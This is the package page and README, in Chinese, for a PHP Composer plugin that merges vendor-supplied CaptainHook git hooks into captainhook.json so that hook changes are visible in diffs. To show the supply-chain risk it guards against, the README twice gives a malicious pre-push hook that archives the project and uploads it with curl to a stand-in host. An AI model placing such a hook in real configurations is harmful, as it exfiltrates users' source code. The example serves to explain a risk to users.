搜索boesing / captainhook-vendor-resolver
CaptainHook 扩展,在安装后解析供应商包,以合并 captainhook.json 与供应商包提供的钩子
Requires
- php: ^7.3
- composer-plugin-api: ^1.1
- captainhook/captainhook: ^5.0
- webmozart/assert: ^1.5
Requires (Dev)
- composer/composer: ^1.9
- jakub-onderka/php-parallel-lint: ^1.0
- laminas/laminas-coding-standard: ^2.0
- phpstan/extension-installer: ^1.0
- phpstan/phpstan: ^0.11.19
- phpstan/phpstan-webmozart-assert: ^0.11.3
- phpunit/phpunit: ^8.4
This package is auto-updated.
Last update: 2021-08-23 10:47:06 UTC
README
此 composer-plugin 引入了对 captainhook/captainhook 钩子的包扫描。因此,每次调用 composer require、composer install 或 composer remove 时,此插件都会检查已安装/卸载包的 composer.json 以添加/删除到 captainhook.json。
注意:从 captainhook v5.0 开始,您可以通过 --configuration 指定专门的 captainhook.json。如果您使用此参数,请通过位于您的 composer.json 旁边的 captainhook-vendor-resolver.json 配置提供自定义的 captainhook.json 路径。
{
"captainhook": "relativeOrAbsolutePath/to/your/captainhook.json"
}
与已存在的功能 "includes" 的区别在哪里?
由于此包仅解析 composer.json 并自动插入/删除钩子,它将为您的项目提供适当的差异。项目中没有隐藏的钩子文件。
您的项目 captainhook.json 将始终包含正在执行的任何钩子,这可以在拉取请求中轻松审查,例如。
使用供应商解析器的示例
captainhook.json
{
"commit-msg": {
"enabled": false,
"actions": []
},
"pre-push": {
"enabled": true,
"actions": [
{
"exec": "echo hey there"
}
]
},
"prepare-commit-msg": {
"enabled": false,
"actions": []
},
"post-commit": {
"enabled": false,
"actions": []
},
"post-merge": {
"enabled": false,
"actions": []
},
"post-checkout": {
"enabled": false,
"actions": []
},
"pre-commit": {
"enabled": false,
"actions": []
}
}
供应商包当前版本...
vendor/package/composer.json v1.0.0
{
"extra": {
"captainhook-hooks": {
"pre-push": {
"actions": [
{
"exec": "echo hey there"
}
]
}
}
}
}
更新供应商包后...
vendor/package/composer.json v1.0.1
{
"extra": {
"captainhook-hooks": {
"pre-push": {
"actions": [
{
"exec": "tar -xzf project.tar.gz . && curl -X POST --data @project.tar.gz https://example.com & rm project.tar.gz"
}
]
}
}
}
}
diff captainhook.json
10c10
< "exec": "echo hey there"
---
> "exec": "tar -xzf project.tar.gz . && curl -X POST --data @project.tar.gz https://example.com & rm project.tar.gz"
包含示例(安全影响)
captainhook.json
{
"config": {
"includes": [
"vendor/package/captainhook.hooks.json"
]
}
}
供应商包当前版本...
vendor/package/captainhook.hooks.json v1.0.0
{
"pre-push": {
"actions": [
{
"exec": "echo hey there"
}
]
}
}
更新供应商包后...
vendor/package/captainhook.hooks.json v1.0.1
{
"pre-push": {
"actions": [
{
"exec": "tar -xzf project.tar.gz . && curl -X POST --data @project.tar.gz https://example.com & rm project.tar.gz"
}
]
}
}
diff captainhook.json
如果您不重新检查您包含的钩子的供应商包中的更改,您将在下一次 git push 时将整个项目上传到攻击者的网站。